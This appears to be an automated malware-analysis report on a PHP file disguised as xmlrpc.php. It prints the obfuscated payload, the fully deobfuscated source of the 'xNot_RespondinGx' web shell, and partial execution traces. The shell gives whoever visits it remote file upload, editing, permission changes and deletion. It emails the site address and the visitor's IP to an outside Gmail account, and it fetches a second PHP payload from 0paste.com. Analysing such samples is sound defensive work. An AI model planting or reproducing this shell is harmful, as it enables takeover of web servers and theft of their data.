PHP Malware Analysis
xmlrpc.php
md5: b835f7950c49a1a536f60ccfb3801f35
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Emails
- ramdan19id@gmail.com (Deobfuscated, Traces)
Encoding
Environment
- error_reporting (Deobfuscated, Traces)
- getcwd (Deobfuscated, Traces)
- set_time_limit (Deobfuscated, Traces)
Execution
Files
- copy (Deobfuscated, Traces)
Input
- _FILES (Deobfuscated, Traces)
- _GET (Deobfuscated, Traces)
- _POST (Deobfuscated, Traces)
URLs
- http://$target (Traces)
- http://localhost/uploads/xmlrpc.php (Traces)
- https://0paste.com/122966.txt (Deobfuscated, Traces)
- https://fonts.googleapis.com/css?family=Ubuntu+Mono (Deobfuscated, HTML, Traces)
Deobfuscated PHP code
<?php
/*
xNot_RespondinGx Shell version 2.1
Created By : xNot_RespondinGx
Facebook : fb.com/sontik.sontik5
*/
$xNot = "Sy1LzNFQKyzNL7G2V0svsYYw9dKrSvOS83MLilKLizXQOJl5aTmJJalYWUmJxalmJvEpqcn5KakaxSVFRallGioVfvklRppQYA0A";
$xNot2 = "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";
eval /* PHPDeobfuscator eval output */ {
/*
xNot_RespondinGx mini shell v2.1
*/
set_time_limit(0);
error_reporting(0);
error_log(0);
$__gcdir = "getcwd";
$__fgetcon7s = "file_get_contents";
$__scdir = "scandir";
$rm__dir = "rmdir";
$un__link = "unlink";
if (get_magic_quotes_gpc()) {
foreach ($_POST as $key => $value) {
$_POST[$key] = stripslashes($value);
}
}
echo "<!DOCTYPE HTML>\r\n<html>\r\n<head>\r\n<link href=\"\" rel=\"stylesheet\" type=\"text/css\">\r\n<style>\r\n@import url(\"https://fonts.googleapis.com/css?family=Ubuntu+Mono\");\r\nbody{\r\nfont-family: \"Ubuntu Mono\", monospace;\r\nfont-weight: normal;\r\nfont-style: normal;\r\nbackground-color: black;\r\ncolor:#87CEFA;\r\n}\r\n#content tr:hover{\r\nbackground-color: black;\r\n}\r\n#content .first{\r\nbackground-color: #87CEFA;\r\n}\r\ntable{\r\nborder: 1px #87CEFA solid;\r\n}\r\na{\r\ncolor:#87CEFA;\r\ntext-decoration: none;\r\n}\r\na:hover{\r\ncolor:#87CEFA;\r\n}\r\ninput,select,textarea{\r\nborder: 1px #000000 solid;\r\n-moz-border-radius: 5px;\r\n-webkit-border-radius:5px;\r\nborder-radius:5px;\r\n}\r\n</style>\r\n</head><center><h1><b><font color=#87CEFA size=8>xNot_RespondinGx</font></a></h1></b></center>\r\n<body>\r\n<table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\r\n";
echo "<tr><td>";
echo "<center><a href='?dir={$dir}&jancok=sumon'> Sumon | </a><a href='?dir={$dir}&kill=self'>Kill</a><br><br>";
echo "<font color='#87CEFA'>Dir:</font> ";
if (isset($_GET['path'])) {
$path = $_GET['path'];
} else {
$path = $__gcdir();
}
$buffs = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIkJhcnUgc2FqYSBkaSBodHRwOi8vJHRhcmdldCBieSAkdmlzaXRvciI7DQogICRib2R5ICAgID0gImRpcmVjdG9yeTogJHRhcmdldCBieTogJHZpc2l0b3IgcGFzc3dvcmQ6ICRhdXRoX3Bhc3MiOw0KICBpZiAoIWVtcHR5KCR3ZWIpKSB7IEBtYWlsKCJyYW1kYW4xOWlkQGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHMiLCR2aXNpdGMpOw==";
eval /* PHPDeobfuscator eval output */ {
$visitc = $_COOKIE["visits"];
if ($visitc == "") {
$visitc = 0;
$visitor = $_SERVER["REMOTE_ADDR"];
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$target = rawurldecode($web . $inj);
$judul = "Baru saja di http://{$target} by {$visitor}";
$body = "directory: {$target} by: {$visitor} password: {$auth_pass}";
if (!empty($web)) {
@mail("ramdan19id@gmail.com", $judul, $body, $auth_pass);
}
} else {
$visitc++;
}
@setcookie("visits", $visitc);
};
$path = str_replace('\\', '/', $path);
$paths = explode('/', $path);
foreach ($paths as $id => $pat) {
if ($pat == '' && $id == 0) {
$a = true;
echo "<a href=\"?path=/\">/</a>";
continue;
}
if ($pat == '') {
continue;
}
echo "<a href=\"?path=";
for ($i = 0; $i <= $id; $i++) {
echo "{$paths[$i]}";
if ($i != $id) {
echo "/";
}
}
echo '">' . $pat . '</a>/';
}
echo "</td></tr><tr><td>";
if (isset($_FILES['file'])) {
if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
echo "<font color=\"green\">Upload Berhasil</font><br />";
} else {
echo "<font color=\"red\">Upload Gagal</font><br/>";
}
}
echo "<form enctype=\"multipart/form-data\" method=\"POST\">\r\n<font color=\"#87CEFA\">File Upload :</font> <input type=\"file\" name=\"file\" />\r\n<input type=\"submit\" value=\"upload\" />\r\n</form>\r\n</td></tr>";
if ($_GET['kill'] == 'self') {
if (@$un__link("/var/www/html/xmlrpc.php.f3979f2bcf72bb749a0655e6370a3f78.bin")) {
die('<center><br><center><h2>xNot_RespondinGx Always Gans :v</h2></center></center>');
} else {
echo "<center>\$un__link failed!</center>";
}
}
if ($_GET['jancok'] == 'sumon') {
$full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
function sumon($url, $isi)
{
$fp = fopen($isi, "w");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
}
if (file_exists('.01.php.php')) {
echo "<center><font color=white><a href='{$full}/.Rmdn.php.php' target='_blank'>-> .01.php sukses <-</a></font></center>";
} else {
if (sumon("https://0paste.com/122966.txt", ".Rmdn.php.php")) {
echo "<center><font color=white><a href='{$full}/.Rmdn.php.php' target='_blank'>-> .01.php sukses <-</a></font></center>";
} else {
echo "<center><font color=red>gagal cok</font></center>";
}
}
}
if (isset($_GET['filesrc'])) {
echo "<tr><td>Current File : ";
echo $_GET['filesrc'];
echo "</tr></td></table><br />";
echo '<pre>' . htmlspecialchars($__fgetcon7s($_GET['filesrc'])) . '</pre>';
} elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
echo '</table><br /><center>' . $_POST['path'] . '<br /><br />';
if ($_POST['opt'] == 'chmod') {
if (isset($_POST['perm'])) {
if (chmod($_POST['path'], $_POST['perm'])) {
echo "<font color=\"green\">Change Permission Berhasil</font><br/>";
} else {
echo "<font color=\"red\">Change Permission Gagal</font><br />";
}
}
echo '<form method="POST">
Permission : <input name="perm" type="text" size="4" value="' . substr(sprintf('%o', fileperms($_POST['path'])), -4) . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="chmod">
<input type="submit" value="Go" />
</form>';
} elseif ($_POST['opt'] == 'rename') {
if (isset($_POST['newname'])) {
if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
echo "<font color=\"green\">Ganti Nama Berhasil</font><br/>";
} else {
echo "<font color=\"red\">Ganti Nama Gagal</font><br />";
}
$_POST['name'] = $_POST['newname'];
}
echo '<form method="POST">
New Name : <input name="newname" type="text" size="20" value="' . $_POST['name'] . '" />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="rename">
<input type="submit" value="Go" />
</form>';
} elseif ($_POST['opt'] == 'edit') {
if (isset($_POST['src'])) {
$fp = fopen($_POST['path'], 'w');
if (fwrite($fp, $_POST['src'])) {
echo "<font color=\"green\">Berhasil Edit File</font><br/>";
} else {
echo "<font color=\"red\">Gagal Edit File</font><br/>";
}
fclose($fp);
}
echo '<form method="POST">
<textarea cols=80 rows=20 name="src">' . htmlspecialchars($__fgetcon7s($_POST['path'])) . '</textarea><br />
<input type="hidden" name="path" value="' . $_POST['path'] . '">
<input type="hidden" name="opt" value="edit">
<input type="submit" value="Save" />
</form>';
}
echo "</center>";
} else {
echo "</table><br/><center>";
if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
if ($_POST['type'] == 'dir') {
if ($rm__dir($_POST['path'])) {
echo "<font color=\"green\">Directory Terhapus</font><br/>";
} else {
echo "<font color=\"red\">Directory Gagal Terhapus </font><br/>";
}
} elseif ($_POST['type'] == 'file') {
if ($un__link($_POST['path'])) {
echo "<font color=\"green\">File Terhapus</font><br/>";
} else {
echo "<font color=\"red\">File Gagal Dihapus</font><br/>";
}
}
}
echo "</center>";
$_scdir = $__scdir($path);
echo "<div id=\"content\"><table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\r\n<tr class=\"first\">\r\n<td><center>Name</peller></center></td>\r\n<td><center>Size</peller></center></td>\r\n<td><center>Permission</peller></center></td>\r\n<td><center>Modify</peller></center></td>\r\n</tr>";
foreach ($_scdir as $dir) {
if (!is_dir($path . '/' . $dir) || $dir == '.' || $dir == '..') {
continue;
}
echo '<tr>
<td><a href="?path=' . $path . '/' . $dir . '">' . $dir . '</a></td>
<td><center>--</center></td>
<td><center>';
if (is_writable($path . '/' . $dir)) {
echo "<font color=\"lime\">";
} elseif (!is_readable($path . '/' . $dir)) {
echo "<font color=\"red\">";
}
echo perms($path . '/' . $dir);
if (is_writable($path . '/' . $dir) || !is_readable($path . '/' . $dir)) {
echo "</font>";
}
echo '</center></td>
<td><center><form method="POST" action="?option&path=' . $path . '">
<select name="opt">
<option value="">Select</option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
</select>
<input type="hidden" name="type" value="dir">
<input type="hidden" name="name" value="' . $dir . '">
<input type="hidden" name="path" value="' . $path . '/' . $dir . '">
<input type="submit" value=">">
</form></center></td>
</tr>';
}
echo "<tr class=\"first\"><td></td><td></td><td></td><td></td></tr>";
foreach ($_scdir as $file) {
if (!is_file($path . '/' . $file)) {
continue;
}
$size = filesize($path . '/' . $file) / 1024;
$size = round($size, 3);
if ($size >= 1024) {
$size = round($size / 1024, 2) . ' MB';
} else {
$size .= ' KB';
}
echo '<tr>
<td><a href="?filesrc=' . $path . '/' . $file . '&path=' . $path . '">' . $file . '</a></td>
<td><center>' . $size . '</center></td>
<td><center>';
if (is_writable($path . '/' . $file)) {
echo "<font color=\"lime\">";
} elseif (!is_readable($path . '/' . $file)) {
echo "<font color=\"red\">";
}
echo perms($path . '/' . $file);
if (is_writable($path . '/' . $file) || !is_readable($path . '/' . $file)) {
echo "</font>";
}
echo '</center></td>
<td><center><form method="POST" action="?option&path=' . $path . '">
<select name="opt">
<option value="">Select</option>
<option value="delete">Delete</option>
<option value="chmod">Chmod</option>
<option value="rename">Rename</option>
<option value="edit">Edit</option>
</select>
<input type="hidden" name="type" value="file">
<input type="hidden" name="name" value="' . $file . '">
<input type="hidden" name="path" value="' . $path . '/' . $file . '">
<input type="submit" value=">">
</form></center></td>
</tr>';
}
echo "</table>\r\n</div>";
}
echo "\r\n</body>\r\n</html>";
function perms($file)
{
$perms = fileperms($file);
if (($perms & 0xc000) == 0xc000) {
// Socket
$info = 's';
} elseif (($perms & 0xa000) == 0xa000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= $perms & 0x100 ? 'r' : '-';
$info .= $perms & 0x80 ? 'w' : '-';
$info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-');
// Group
$info .= $perms & 0x20 ? 'r' : '-';
$info .= $perms & 0x10 ? 'w' : '-';
$info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-');
// World
$info .= $perms & 0x4 ? 'r' : '-';
$info .= $perms & 0x2 ? 'w' : '-';
$info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-');
return $info;
}
};
exit;Execution traces
data/traces/b835f7950c49a1a536f60ccfb3801f35_trace-1676261466.0842.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:11:31.982083]
1 0 1 0.000178 393528
1 3 0 0.000277 402464 {main} 1 /var/www/html/uploads/xmlrpc.php 0 0
1 A /var/www/html/uploads/xmlrpc.php 7 $xNot = 'Sy1LzNFQKyzNL7G2V0svsYYw9dKrSvOS83MLilKLizXQOJl5aTmJJalYWUmJxalmJvEpqcn5KakaxSVFRallGioVfvklRppQYA0A'
1 A /var/www/html/uploads/xmlrpc.php 8 $xNot2 = 'Sss/XPbrQcIA/r92aTsTuyzxk/Ta6kHC8fygbgEq8vgy/wn8peU7eejGTY+Wr34xqjF28PjxHDuXaH1+nX+H+mHWX3S6qZIO8vh4iQ1OPlxdoJnijCcOFRttoTflVbNMuB7ZTyqFarFzfF0fAaxy0WV9IdrtZWpLrsUQy1EHc40XggQlccmgOdScI78VcFpRvQRCDTceSMuZNi2EVOKHtyRsTC2XYDO24dsDlKgSUKGVjeZMAZJaoTaCbgExtNil1DiTGmXIeUQgGTQzMOmNxs8aYMx9LN2BFmqA2JdMbjU5sC5JXB9ZARsWnv7UQMp9h8I2GeZzJiwtJMH7F9tTjAwAEOWX1GhYEWAvlOL/yVpKeFb6Q9KLVuJKIdC+eqdSFx0s4XWZwQOjDuL8te6h+9P5QB+fDbAyauVfGwoNPbCF9+PiWGcn/UcEwUyjIvM/ft83UPIsqgzn8Mtc/f6ZdYNlknq73+tgirmT4fYLzcyfvmjJn8c9CheCZUClE9ib'
2 4 0 0.000360 402464 base64_decode 0 /var/www/html/uploads/xmlrpc.php 9 1 'Sy1LzNFQKyzNL7G2V0svsYYw9dKrSvOS83MLilKLizXQOJl5aTmJJalYWUmJxalmJvEpqcn5KakaxSVFRallGioVfvklRppQYA0A'
2 4 1 0.000385 402624
2 4 R 'K-K��P+,�/��WK/��0�ҫJ��s\v�R��5�8�yi9�%�XYI�ũf&�)��)�\032�%EE�e\032*\025~�%F�P`\r\000'
2 5 0 0.000417 402592 gzinflate 0 /var/www/html/uploads/xmlrpc.php 9 1 'K-K��P+,�/��WK/��0�ҫJ��s\v�R��5�8�yi9�%�XYI�ũf&�)��)�\032�%EE�e\032*\025~�%F�P`\r\000'
2 5 1 0.000448 402784
2 5 R 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($xNot2))))))));'
2 6 0 0.000473 402624 htmlspecialchars_decode 0 /var/www/html/uploads/xmlrpc.php 9 1 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($xNot2))))))));'
2 6 1 0.000498 402848
2 6 R 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($xNot2))))))));'
2 7 0 0.000537 405000 eval 1 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($xNot2))))))));' /var/www/html/uploads/xmlrpc.php 9 0
3 8 0 0.000560 405000 strrev 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code 1 1 'Sss/XPbrQcIA/r92aTsTuyzxk/Ta6kHC8fygbgEq8vgy/wn8peU7eejGTY+Wr34xqjF28PjxHDuXaH1+nX+H+mHWX3S6qZIO8vh4iQ1OPlxdoJnijCcOFRttoTflVbNMuB7ZTyqFarFzfF0fAaxy0WV9IdrtZWpLrsUQy1EHc40XggQlccmgOdScI78VcFpRvQRCDTceSMuZNi2EVOKHtyRsTC2XYDO24dsDlKgSUKGVjeZMAZJaoTaCbgExtNil1DiTGmXIeUQgGTQzMOmNxs8aYMx9LN2BFmqA2JdMbjU5sC5JXB9ZARsWnv7UQMp9h8I2GeZzJiwtJMH7F9tTjAwAEOWX1GhYEWAvlOL/yVpKeFb6Q9KLVuJKIdC+eqdSFx0s4XWZwQOjDuL8te6h+9P5QB+fDbAyauVfGwoNPbCF9+PiWGcn/UcEwUyjIvM/ft83UPIsqgzn8Mtc/f6ZdYNlknq73+tgirmT4fYLzcyfvmjJn8c9CheCZUClE9ib'
3 8 1 0.000601 413224
3 8 R 'AXUNivIBcA2P8gFrDZTyeJwBYA2f8nic7Vppc9tGD/4cz/g/bFg1lBpZlx2folJbtmw5PhJJvhJnNBS5kjbiVS5lWWnz31/swUuH46Sdvl/qqUpyATwAdrEAlkz1rTf0VleKv62uIPh7vHCDbgtTz3VM4hw/Ips4BNEhtiz0UCmUV1d+K66uUBx0A2LjrkVsEmRLub3VFez7rt/1sef6AXEGyUHLlY+rK5lud2CYxGe6kIaU+8fNLQUV+M2b+8etDbiuw3ULrhvKHhfoD3BguM4WlQKb8NuBn8FkpPCbPkOKQfgzAG2yK5bAb+L7rXUJTpPW0NAUJlkW3JtMcocTfC7j291uyoOtCnCY3GDGRQTb2OnC9DijmI2rDzUY0gmmoafwuSH9LHjatfUBMbp/jN0A0+7AM7K53J+rK33Xx7oxzGa67y/bHaRTlBnhqVbLPOjWGDMOQfnEhj+DRhr4xKOWDmtHs5IL1KBvqyvwHzaGLlKrLw8v652790fopHN+'
3 9 0 0.000642 413192 base64_decode 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code 1 1 'AXUNivIBcA2P8gFrDZTyeJwBYA2f8nic7Vppc9tGD/4cz/g/bFg1lBpZlx2folJbtmw5PhJJvhJnNBS5kjbiVS5lWWnz31/swUuH46Sdvl/qqUpyATwAdrEAlkz1rTf0VleKv62uIPh7vHCDbgtTz3VM4hw/Ips4BNEhtiz0UCmUV1d+K66uUBx0A2LjrkVsEmRLub3VFez7rt/1sef6AXEGyUHLlY+rK5lud2CYxGe6kIaU+8fNLQUV+M2b+8etDbiuw3ULrhvKHhfoD3BguM4WlQKb8NuBn8FkpPCbPkOKQfgzAG2yK5bAb+L7rXUJTpPW0NAUJlkW3JtMcocTfC7j291uyoOtCnCY3GDGRQTb2OnC9DijmI2rDzUY0gmmoafwuSH9LHjatfUBMbp/jN0A0+7AM7K53J+rK33Xx7oxzGa67y/bHaRTlBnhqVbLPOjWGDMOQfnEhj+DRhr4xKOWDmtHs5IL1KBvqyvwHzaGLlKrLw8v652790fopHN+'
3 9 1 0.000695 421416
3 9 R '\001u\r��\001p\r��\001k\r��x�\001`\r��x��Zis�F\017�\034�?lX5�\032Y�\035��R[�l9>\022I�\022g4\024��6�U.eYi��_�K�㤝�_�Jr\001<\000v�\000�L��7�VW���� �{�p�n\vS�uL�\034?"�8\004�!�,�P)�WW~+��P\034t\003b�El\022dK���\025����\001q\006�A˕��+�nw`��g�������-\005\025�͛�ǭ\r���u\v�\033�\036\027�\017p`��\026�\002��ہ��d��>C�A�3\000m�+��o�u\tN����\024&Y\026ܛLr�\023|.���nʃ�\np��`�E\004�����8����\0175\030�\t����!�,xڵ�\0011���\000��3��ܟ�+}�Ǻ1�f��/�\035�S�\031�V�<��\0303\016A�Ć?�F\032�ģ�\016kG��\vԠo�+�'
3 10 0 0.000830 413192 gzinflate 0 /var/www/html/uploads/xmlrpc.php(9) : eval()'d code 1 1 '\001u\r��\001p\r��\001k\r��x�\001`\r��x��Zis�F\017�\034�?lX5�\032Y�\035��R[�l9>\022I�\022g4\024��6�U.eYi��_�K�㤝�_�Jr\001<\000v�\000�L��7�VW���� �{�p�n\vS�uL�\034?"�8\004�!�,�P)�WW~+��P\034t\003b�El\022dK���\025����\001q\006�A˕��+�nw`��g�������-\005\025�͛�ǭ\r���u\v�\033�\036\027�\017p`��\026�\002��ہ��d��>C�A�3\000m�+��o�u\tN����\024&Y\026ܛLr�\023|.���nʃ�\np��`�E\004�����8����\0175\030�\t����!�,xڵ�\0011���\000��3��ܟ�+}�Ǻ1�f��/�\035�S�\031�V�<��\0303\016A�Ć?�F\032�ģ�\016kG��\vԠo�+�'
3 10 1 0.000969 417320
